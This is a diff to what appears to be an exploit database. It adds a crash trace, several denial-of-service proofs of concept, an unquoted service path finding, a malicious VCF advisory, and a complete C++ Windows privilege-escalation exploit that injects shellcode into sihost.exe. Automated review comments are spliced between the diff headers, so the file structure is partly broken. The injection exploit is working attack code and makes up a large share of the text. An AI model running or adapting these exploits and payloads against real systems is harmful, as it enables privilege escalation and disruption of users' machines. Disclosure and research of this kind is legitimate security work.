+BUGCHECK_STR: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ
+
+PRIMARY_PROBLEM_CLASS: NULL_CLASS_PTR_DEREFERENCE
+
+DEFAULT_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE
+
+LAST_CONTROL_TRANSFER: from 00812591 to 00855994
+
+STACK_TEXT:
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0012fc6c 00812591 0085d350 0085d355 0046d181 FTPGetter!Xtermforminitialization$qqrv+0x202d74
+0012fc8c 0079ffc1 0012fd24 00000000 007a15c2 FTPGetter!Xtermforminitialization$qqrv+0x1bf971
+0012fcf8 007a2780 0012fdc8 007a278a 0012fd1c FTPGetter!Xtermforminitialization$qqrv+0x14d3a1
+0012fd1c 0068fda6 00000111 00000030 00000000 FTPGetter!Xtermforminitialization$qqrv+0x14fb60
+0012fd34 7688c267 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x3d186
+0012fd60 7688c367 00250f60 001f0320 00000111 user32!InternalCallWinProc+0x23
+0012fdd8 7688c999 00000000 00250f60 001f0320 user32!UserCallWinProcCheckWow+0x14b
+0012fe38 7688c9f0 00250f60 00000000 001f0320 user32!DispatchMessageWorker+0x357
+0012fe48 007dec94 0012fe6c 00120100 0012feb8 user32!DispatchMessageW+0xf
+0012fe64 007decd7 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x18c074
+0012fe88 007df016 0012fe9c 007df020 0012feb8 FTPGetter!Xtermforminitialization$qqrv+0x18c0b7
+0012feb8 00404674 00000000 00e75048 015c26bb FTPGetter!Xtermforminitialization$qqrv+0x18c3f6
+0012ff50 00aeae2b 00400000 00000000 015c26bb FTPGetter!_GetExceptDLLinfo+0x112f
+0012ff88 7509ef3c 7ffdc000 0012ffd4 77003688 FTPGetter!madTraceProcess+0x3cef7
+0012ff94 77003688 7ffdc000 7702d7f0 00000000 kernel32!BaseThreadInitThunk+0xe
+0012ffd4 7700365b 004034ec 7ffdc000 00000000 ntdll!__RtlUserThreadStart+0x70
+0012ffec 00000000 004034ec 7ffdc000 00000000 ntdll!_RtlUserThreadStart+0x1b
+
+SYMBOL_STACK_INDEX: 0
+
+SYMBOL_NAME: ftpgetter!Xtermforminitialization$qqrv+202d74
+
+FOLLOWUP_NAME: MachineOwner
+
+MODULE_NAME: FTPGetter
+
+IMAGE_NAME: FTPGetter.exe
+
+DEBUG_FLR_IMAGE_TIMESTAMP: 5dffa0bd
+
+STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s ; kb
+
+FAILURE_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE_c0000005_FTPGetter.exe!Xtermforminitialization$qqrv
+
+BUCKET_ID: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ_ftpgetter!Xtermforminitialization$qqrv+202d74
+
+WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/FTPGetter_exe/5_97_0_221/5dffa0bd/FTPGetter_exe/5_97_0_221/5dffa0bd/c0000005/00455994.htm?Retriage=1
+
+Followup: MachineOwner
+---------
+
+NULL pointer
+
+FOLLOWUP_IP:
+REDftp!Xtermforminitialization$qqrv+202d74
+00855994 8b5004 mov edx,dword ptr [eax+4]
+
+Stepping into and running
+
+eax=04e8fc78 ebx=004db6b4 ecx=0000000a edx=41414141 esi=02871ae0 edi=00000000
+eip=004db97a esp=04e8fc74 ebp=04e8fec0 iopl=0 nv up ei pl nz ac pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
+REDftp!GetFTPValidationW+0x6e842:
+004db97a 837a5400 cmp dword ptr [edx+54h],0 ds:0023:41414195=????????
+
+==================================================================
+CVE-2020-5183 is a NULL pointer dereference vulnerability
+==================================================================
\ No newline at end of file
diff --git a/exploits/windows/dos/47873.py b/exploits/windows/dos/47873.py
new file mode 100755
index 000000000..089a7a53d
--- /dev/null
+++ b/exploits/windows/dos/47873.py
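Review bot: The closing statement `CVE-2020-5183 is a NULL pointer dereference vulnerability` is supported only by the first crash (`eax=00000000`, read from address `00000004`); the second trace under `Stepping into and running` shows `edx=41414141` and a read from `41414195`, i.e. a dereference through a pointer whose value came from the input, which is not a NULL dereference and changes how a defender should rate the bug. The writeup should either present the two crashes as separate findings or drop the classification claim and describe what each trace actually shows. The module names also differ between the traces (`FTPGetter!` vs `REDftp!`), and the WATSON URL reports build `5_97_0_221` while the header claims `5.97.0.223`, so it is unclear which binary each trace comes from; the tested build should be stated once and each trace labelled with it.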
@@ -0,0 +1,26 @@
+# Exploit Title: Duplicate Cleaner Pro 4 - Denial of Service (PoC)
+# Date: 2020-01-05
+# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
+# Software Link: https://www.digitalvolcano.co.uk/download/DuplicateCleanerPro4_setup.exe
+# Exploit Author: Achilles
+# Tested Version: 4.1.3
+# Tested on: Windows 7 x64
+
+
+# 1.- Run python code :
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Duplicate Cleaner Pro
+# 4.- Paste the content of EVIL.txt into the Field: 'License key'
+# 5.- Click 'Activate' and you will see a crash.
+
+#!/usr/bin/env python
+buffer =3D "\x41" * 6000
+
+try:
+f.open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47878.txt b/exploits/windows/dos/47878.txt
new file mode 100644
index 000000000..e477d4cb1
--- /dev/null
+++ b/exploits/windows/dos/47878.txt
@@ -0,0 +1,93 @@
+# Exploit Title: Microsoft Outlook VCF cards - Denial of Service (PoC)
+# Date: 2020-01-04
+# Exploit Author: hyp3rlinx
+# Vendor Homepage: www.microsoft.com
+
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-MAILTO-LINK-DENIAL-OF-SERVICE.txt
+[+] twitter.com/hyp3rlinx
+[+] ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+A VCF file is a standard file format for storing contact information for a person or business.
+Microsoft Outlook supports the vCard and vCalendar features.
+These are a powerful new approach to electronic Personal Data Interchange (PDI).
+
+
+[Vulnerability Type]
+Mailto Link Denial Of Service
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Windows VCF cards do not properly sanitize email addresses allowing for HTML injection.
+A corrupt VCF card can cause all the users currently opened files and applications to be closed
+and their session to be terminated without requiring any accompanying attacker supplied code.
+
+This can be done by crafting the Mailto link to point to Windows "logoff.exe". The corrupt VCF card can then
+kill all users applications and also log the target off their computer, if the VCF card is opened in
+using Windows Contacts and the link is clicked.
+
+The logoff.exe executable lives in "C:\Windows\System32" and can terminate applications and log out users without requiring args.
+
+This probably will affect Windows 7 the most as Windows 10 can possibly default opening VCF files in other programs
+like (People). However, users can possibly still choose to open the VCF in Contacts by right-click the file.
+
+Note, this exploit requires user interaction.
+
+[Exploit/POC]
+"VCF_DoS.py"
+
+dirty_vcf=(
+'BEGIN:VCARD\n'
+'VERSION:4.0\n'
+'FN:Session Terminate PoC - ApparitionSec\n'
+'EMAIL:DoS@microsoft.com\n'
+'END:VCARD')
+
+f=open("DoS.vcf", "w")
+f.write(dirty_vcf)
+f.close()
+
+print "VCF Denial Of Service card created!"
+print "By hyp3rlinx"
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=P4OGN7pZLSg
+
+
+[Network Access]
+Local
+
+
+[Severity]
+Medium
+
+
+[Disclosure Timeline]
+Vendor Notification: January 2, 2020
+MSRC : "In order to investigate your report I will need an explanation on how an attacker could use the information
+ to exploit another user remotely without the use of social engineering... As such, this thread is being closed"
+ : January 3, 2020
+January 4, 2020 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
\ No newline at end of file
diff --git a/exploits/windows/local/47852.txt b/exploits/windows/local/47852.txt
new file mode 100644
index 000000000..16a30973f
--- /dev/null
+++ b/exploits/windows/local/47852.txt
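Review bot: The embedded `VCF_DoS.py` uses Python 2 `print` statements and has no shebang or interpreter note, so under a current Python 3 install it fails with a syntax error before writing anything; either add `#!/usr/bin/env python2` or switch to `print(...)`, which works on both. The `f=open("DoS.vcf", "w")` / `f.write` / `f.close()` sequence would also be clearer and leak-free as `with open("DoS.vcf", "w") as f:`. The enclosing advisory text does not state which Python version the snippet was run with.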
@@ -0,0 +1,24 @@
+#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2020-01-05
+#Vendor Homepage : http://webcompanion.com/
+#Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2
+#Tested on OS: Windows 10
+
+
+#Analyze PoC :
+==============
+
+C:\Users\ZwX>sc qc WCAssistantService
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: WCAssistantService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : WC Assistant
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47880.cc b/exploits/windows/local/47880.cc
new file mode 100644
index 000000000..f02ebcf47
--- /dev/null
+++ b/exploits/windows/local/47880.cc
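Review bot: The `sc qc` output establishes the unquoted `BINARY_PATH_NAME` with spaces and `SERVICE_START_NAME : LocalSystem`, but the entry never records whether a standard user can create files in `C:\` or `C:\Program Files\` on the tested system; with default Windows 10 ACLs they cannot, and without that precondition the finding is informational rather than a privilege escalation. The PoC should pair the service query with a directory permission check, e.g. `icacls "C:\Program Files"`, and state the result so a reader can judge impact. The `#Tested on OS: Windows 10` header would also benefit from the build number, since the default ACLs are what the impact hinges on.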
@@ -0,0 +1,270 @@ +// Axel '0vercl0k' Souchet - December 28 2019 +// References: +// - Found by an anonymous researcher, written up by Simon '@HexKitchen' Zuckerbraun +// - https://www.zerodayinitiative.com/blog/2019/12/19/privilege-escalation-via-the-core-shell-com-registrar-object +// - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sserver/sserver.cpp +// - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sclient/sclient.cpp + +#include +#include +#include + +// 54E14197-88B0-442F-B9A3-86837061E2FB +// .rdata:0000000000014108 CLSID_CoreShellComServerRegistrar dd 54E14197h ; Data1 +// .rdata:0000000000014108 dw 88B0h ; Data2 +// .rdata:0000000000014108 dw 442Fh ; Data3 +// .rdata:0000000000014108 db 0B9h, 0A3h, 86h, 83h, 70h, 61h, 0E2h, 0FBh ; Data4 +const GUID CLSID_CoreShellComServerRegistrar = { + 0x54e14197, 0x88b0, 0x442f, { + 0xb9, 0xa3, 0x86, 0x83, 0x70, 0x61, 0xe2, 0xfb +}}; + +// 27EB33A5-77F9-4AFE-AE056-FDBBE720EE7 +// .rdata:00000000000140B8 GuidICOMServerRegistrar dd 27EB33A5h ; Data1 +// .rdata:00000000000140B8 dw 77F9h ; Data2 +// .rdata:00000000000140B8 dw 4AFEh ; Data3 +// .rdata:00000000000140B8 db 0AEh, 5, 6Fh, 0DBh, 0BEh, 72h, 0Eh, 0E7h ; Data4 +MIDL_INTERFACE("27EB33A5-77F9-4AFE-AE05-6FDBBE720EE7") +ICoreShellComServerRegistrar : public IUnknown { + // 0:015> dqs 00007ff8`3fe526e8 + // [...] 
+ // 00007ff8`3fe52730 00007ff8`3fe4a5e0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::QueryInterface + // 00007ff8`3fe52738 00007ff8`3fe4a6d0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::AddRef + // 00007ff8`3fe52740 00007ff8`3fe4a680 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::Release + // 00007ff8`3fe52748 00007ff8`3fe47260 CoreShellExtFramework!CoreShellComServerRegistrar::RegisterCOMServer + // 00007ff8`3fe52750 00007ff8`3fe476b0 CoreShellExtFramework!CoreShellComServerRegistrar::UnregisterCOMServer + // 00007ff8`3fe52758 00007ff8`3fe477f0 CoreShellExtFramework!CoreShellComServerRegistrar::DuplicateHandle + // 00007ff8`3fe52760 00007ff8`3fe47920 CoreShellExtFramework!CoreShellComServerRegistrar::OpenProcess + virtual HRESULT STDMETHODCALLTYPE RegisterCOMServer() = 0; + virtual HRESULT STDMETHODCALLTYPE UnregisterCOMServer() = 0; + virtual HRESULT STDMETHODCALLTYPE DuplicateHandle() = 0; + virtual HRESULT STDMETHODCALLTYPE OpenProcess( + const uint32_t DesiredAccess, + const bool InheritHandle, + const uint32_t ArbitraryPid, + const uint32_t TargetProcessId, + HANDLE *ProcessHandle + ) = 0; +}; + +struct Marshalled_t { + uint32_t Meow; + uint32_t ObjRefType; + GUID IfaceId; + uint32_t Flags; + uint32_t References; + uint64_t Oxid; + uint64_t Oid; + union { + uint64_t IfacePointerIdLow; + struct { + uint64_t _Dummy1 : 32; + uint64_t ServerPid : 16; + }; + }; + + uint64_t IfacePointerIdHigh; +}; + +int main() { + + // + // Initialize COM. 
+ // + + HRESULT Hr = CoInitialize(nullptr); + if(FAILED(Hr)) { + printf("Failed to initialize COM.\nThis might be the best thing that happened in your life, carry on and never look back."); + return EXIT_FAILURE; + } + + // + // Instantiate an out-of-proc instance of `ICoreShellComServerRegistrar`. + // + + CComPtr ComServerRegistrar; + Hr = ComServerRegistrar.CoCreateInstance( + CLSID_CoreShellComServerRegistrar, + nullptr, + CLSCTX_LOCAL_SERVER + ); + + if(FAILED(Hr)) { + printf("You are probably not vulnerable (%08x) bailing out.", Hr); + return EXIT_FAILURE; + } + + // + // We don't use the copy ctor here to avoid leaking the object as the returned + // stream already has its refcount bumped by `SHCreateMemStream`. + // + + CComPtr Stream; + Stream.Attach(SHCreateMemStream(nullptr, 0)); + + // + // Get the marshalled data for the `ICoreShellComServerRegistrar` interface, so + // that we can extract the PID of the COM server (sihost.exe) in this case. + // https://twitter.com/tiraniddo/status/1208073552282488833 + // + + Hr = CoMarshalInterface( + Stream, + __uuidof(ICoreShellComServerRegistrar), + ComServerRegistrar, + MSHCTX_LOCAL, + nullptr, + MSHLFLAGS_NORMAL + ); + + if(FAILED(Hr)) { + printf("Failed to marshal the interface (%08x) bailing out.", Hr); + return EXIT_FAILURE; + } + + // + // Read the PID out of the blob now. + // + + const LARGE_INTEGER Origin {}; + Hr = Stream->Seek(Origin, STREAM_SEEK_SET, nullptr); + + uint8_t Buffer[0x1000] {}; + Hr = Stream->Read(Buffer, sizeof(Buffer), nullptr); + + union { + Marshalled_t *Blob; + void *Raw; + } Ptr; + + Ptr.Raw = Buffer; + const uint32_t SihostPid = Ptr.Blob->ServerPid; + + // + // Ready to get a `PROCESS_ALL_ACCESS` handle to the server now! 
+ // + + HANDLE ProcessHandle; + Hr = ComServerRegistrar->OpenProcess( + PROCESS_ALL_ACCESS, + false, + SihostPid, + GetCurrentProcessId(), + &ProcessHandle + ); + + if(FAILED(Hr)) { + printf("Failed to OpenProcess (%08x) bailing out.", Hr); + return EXIT_FAILURE; + } + + // + // Allocate executable memory in the target. + // + + const auto ShellcodeAddress = LPTHREAD_START_ROUTINE(VirtualAllocEx( + ProcessHandle, + nullptr, + 0x1000, + MEM_COMMIT | MEM_RESERVE, + PAGE_EXECUTE_READWRITE + )); + + if(ShellcodeAddress == nullptr) { + printf("Failed to VirtualAllocEx memory in the target process (%d) bailing out.", GetLastError()); + return EXIT_FAILURE; + } + + // + // This is a CreateProcess(calc) shellcode generated with scc, see payload.cc. + // + + const uint8_t Shellcode[] { + 0x48, 0x83, 0xc4, 0x08, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x08, 0x55, 0x48, 0x8b, 0xec, + 0x48, 0x8d, 0x64, 0x24, 0xf0, 0x48, 0x8d, 0x05, 0x42, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0, + 0x6a, 0x00, 0x8f, 0x45, 0xf8, 0x48, 0x8d, 0x05, 0x3a, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x08, 0x48, + 0x8d, 0x55, 0xf0, 0xe8, 0x63, 0x01, 0x00, 0x00, 0xe8, 0xbf, 0x01, 0x00, 0x00, 0xc9, 0xc3, 0x53, + 0x56, 0x57, 0x41, 0x54, 0x55, 0x48, 0x8b, 0xec, 0x6a, 0x60, 0x58, 0x65, 0x48, 0x8b, 0x00, 0x48, + 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x70, 0x10, 0x48, 0x8b, 0x46, 0x30, 0x48, 0x83, 0xf8, 0x00, 0x74, + 0x13, 0xeb, 0x08, 0x4c, 0x8b, 0x06, 0x49, 0x8b, 0xf0, 0xeb, 0xec, 0x45, 0x33, 0xdb, 0x66, 0x45, + 0x33, 0xd2, 0xeb, 0x09, 0x33, 0xc0, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x66, 0x8b, 0x46, + 0x58, 0x66, 0x44, 0x3b, 0xd0, 0x72, 0x11, 0xeb, 0x3c, 0x66, 0x45, 0x8b, 0xc2, 0x66, 0x41, 0x83, + 0xc0, 0x02, 0x66, 0x45, 0x8b, 0xd0, 0xeb, 0xe5, 0x45, 0x8b, 0xcb, 0x41, 0xc1, 0xe9, 0x0d, 0x41, + 0x8b, 0xc3, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc8, 0x41, 0x8b, 0xc1, 0x4c, 0x8b, 0x46, 0x60, 0x45, + 0x0f, 0xb7, 0xca, 0x4d, 0x03, 0xc1, 0x45, 0x8a, 0x00, 0x45, 0x0f, 0xbe, 0xc0, 0x41, 0x83, 0xf8, + 0x61, 0x72, 0x15, 0xeb, 0x07, 
0x41, 0x3b, 0xcb, 0x74, 0x16, 0xeb, 0x97, 0x41, 0x83, 0xe8, 0x20, + 0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xb1, 0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xa9, + 0x4c, 0x8b, 0x56, 0x30, 0x41, 0x8b, 0x42, 0x3c, 0x4d, 0x8b, 0xe2, 0x4c, 0x03, 0xe0, 0x41, 0x8b, + 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x33, 0xdb, 0x41, + 0x8b, 0x41, 0x18, 0x44, 0x3b, 0xd8, 0x72, 0x0b, 0xe9, 0x56, 0xff, 0xff, 0xff, 0x41, 0x83, 0xc3, + 0x01, 0xeb, 0xec, 0x41, 0x8b, 0x41, 0x20, 0x49, 0x8b, 0xda, 0x48, 0x03, 0xd8, 0x45, 0x8b, 0xc3, + 0x48, 0x8b, 0xc3, 0x4a, 0x8d, 0x04, 0x80, 0x8b, 0x00, 0x49, 0x8b, 0xfa, 0x48, 0x03, 0xf8, 0x33, + 0xc0, 0x48, 0x8b, 0xdf, 0x48, 0x83, 0xc7, 0x01, 0x44, 0x8a, 0x03, 0x41, 0x0f, 0xbe, 0xd8, 0x83, + 0xfb, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x3b, 0xd0, 0x74, 0x17, 0xeb, 0xc1, 0x44, 0x8b, 0xc0, 0x41, + 0xc1, 0xe8, 0x0d, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc0, 0x44, 0x03, 0xc3, 0x41, 0x8b, 0xc0, 0xeb, + 0xd0, 0x41, 0x8b, 0x41, 0x1c, 0x49, 0x8b, 0xd2, 0x48, 0x03, 0xd0, 0x41, 0x8b, 0x41, 0x24, 0x4d, + 0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x8b, 0xc3, 0x49, 0x8b, 0xc1, 0x4a, 0x8d, 0x04, 0x40, 0x66, + 0x8b, 0x00, 0x0f, 0xb7, 0xc8, 0x48, 0x8b, 0xc2, 0x48, 0x8d, 0x04, 0x88, 0x8b, 0x00, 0x4c, 0x03, + 0xd0, 0x49, 0x8b, 0xc2, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x53, 0x56, 0x57, 0x41, 0x54, + 0x55, 0x48, 0x8b, 0xec, 0x48, 0x8b, 0xf1, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0x03, 0x48, 0x83, 0xf8, + 0x00, 0x74, 0x0e, 0x48, 0x8b, 0xc6, 0x48, 0x83, 0xc6, 0x04, 0x44, 0x8b, 0x20, 0x33, 0xff, 0xeb, + 0x07, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x8b, 0x06, 0x41, 0x8b, 0xcc, 0x8b, 0xd0, 0xe8, + 0x6b, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0xd0, 0x48, 0x83, 0xfa, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x48, + 0x83, 0xc3, 0x08, 0xeb, 0xc5, 0x48, 0x8b, 0x03, 0x48, 0x8b, 0xcf, 0x48, 0x83, 0xc7, 0x01, 0x48, + 0x8d, 0x04, 0xc8, 0x48, 0x89, 0x10, 0x48, 0x83, 0xc6, 0x04, 0xeb, 0xcc, 0x57, 0x55, 0x48, 0x8b, + 0xec, 0x48, 0x8d, 0xa4, 0x24, 0x78, 0xff, 0xff, 0xff, 0x48, 0x8d, 
0xbd, 0x78, 0xff, 0xff, 0xff, + 0x32, 0xc0, 0x6a, 0x68, 0x59, 0xf3, 0xaa, 0xc7, 0x85, 0x78, 0xff, 0xff, 0xff, 0x68, 0x00, 0x00, + 0x00, 0x48, 0x8d, 0x05, 0x4a, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x10, 0x4c, 0x8d, 0x95, 0x78, 0xff, + 0xff, 0xff, 0x48, 0x8d, 0x45, 0xe0, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x45, 0x33, 0xc9, 0x50, 0x41, + 0x52, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x48, 0x8d, 0x64, 0x24, 0xe0, 0x48, 0x8d, + 0x05, 0x09, 0x00, 0x00, 0x00, 0xff, 0x10, 0x48, 0x83, 0xc4, 0x50, 0xc9, 0x5f, 0xc3, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x17, 0xca, 0x2b, 0x6e, 0x72, 0xfe, 0xb3, 0x16, 0x00, 0x00, + 0x00, 0x00, 0x63, 0x61, 0x6c, 0x63, 0x00 + }; + + if(!WriteProcessMemory( + ProcessHandle, + ShellcodeAddress, + Shellcode, + sizeof(Shellcode), + nullptr + )) { + printf("Failed to WriteProcessMemory in the target process (%d) bailing out.", GetLastError()); + + // + // At least clean up the remote process D: + // + + VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE); + return EXIT_FAILURE; + } + + // + // Creating a remote thread on the shellcode now. + // + + DWORD ThreadId; + HANDLE ThreadHandle = CreateRemoteThread( + ProcessHandle, + nullptr, + 0, + ShellcodeAddress, + nullptr, + 0, + &ThreadId + ); + + // + // Waiting for the thread to end.. + // + + WaitForSingleObject(ThreadHandle, INFINITE); + + // + // All right, we are done here, let's clean up and exit. + // + + VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE); + printf("Payload has been successfully injected in %d.", SihostPid); + return EXIT_SUCCESS; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 52ce830ff..382fc14cc 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
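Review bot: The results of `Stream->Seek` and `Stream->Read` are assigned to `Hr` but never checked before `Ptr.Blob->ServerPid` is read out of `Buffer`, so a failed or short read silently yields a PID of 0 from the zero-initialised buffer instead of an error; `if (FAILED(Hr)) { printf("Failed to read the marshalled blob (%08lx) bailing out.", Hr); return EXIT_FAILURE; }` after the `Read` call would match the error style used everywhere else in this file. Further down, the return value of `CreateRemoteThread` goes straight into `WaitForSingleObject` without a null check, `ProcessHandle` and `ThreadHandle` are never passed to `CloseHandle`, and `CoInitialize` is never paired with `CoUninitialize`. The `%d` used for `GetLastError()` (a `DWORD`) and `%08x` for `Hr` (an `HRESULT`, i.e. `long`) should be `%lu` and `%08lx`. The comment above `MIDL_INTERFACE` gives the IID as `27EB33A5-77F9-4AFE-AE056-FDBBE720EE7`, whose fourth group has five digits and does not match the string passed to the macro.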
@@ -6627,6 +6627,26 @@ id,file,description,date,author,type,platform,port
 47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
 47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows,
+47848,exploits/windows/dos/47848.py,"NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
+47853,exploits/windows/dos/47853.py,"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47855,exploits/windows/dos/47855.py,"SpotIE 2.9.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47856,exploits/windows/dos/47856.py,"Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47857,exploits/windows/dos/47857.py,"BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47859,exploits/windows/dos/47859.py,"ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47860,exploits/windows/dos/47860.py,"NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47861,exploits/windows/dos/47861.py,"Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47862,exploits/windows/dos/47862.py,"TextCrawler Pro3.1.1 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
+47863,exploits/windows/dos/47863.py,"RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
+47864,exploits/windows/dos/47864.py,"Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail 
Tasdelen",dos,windows, +47865,exploits/windows/dos/47865.py,"RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47866,exploits/windows/dos/47866.py,"NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47867,exploits/windows/dos/47867.py,"Office Product Key Finder 1.5.4 - Denial of Service (PoC)",2020-01-06,Gokkulraj,dos,windows, +47868,exploits/windows/dos/47868.py,"SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47869,exploits/windows/dos/47869.py,"SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows, +47870,exploits/windows/dos/47870.py,"SpotIM 2.2 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows, +47871,exploits/windows/dos/47871.txt,"FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)",2020-01-06,FULLSHADE,dos,windows, +47873,exploits/windows/dos/47873.py,"Duplicate Cleaner Pro 4 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows, +47878,exploits/windows/dos/47878.txt,"Microsoft Outlook VCF cards - Denial of Service (PoC)",2020-01-06,hyp3rlinx,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege 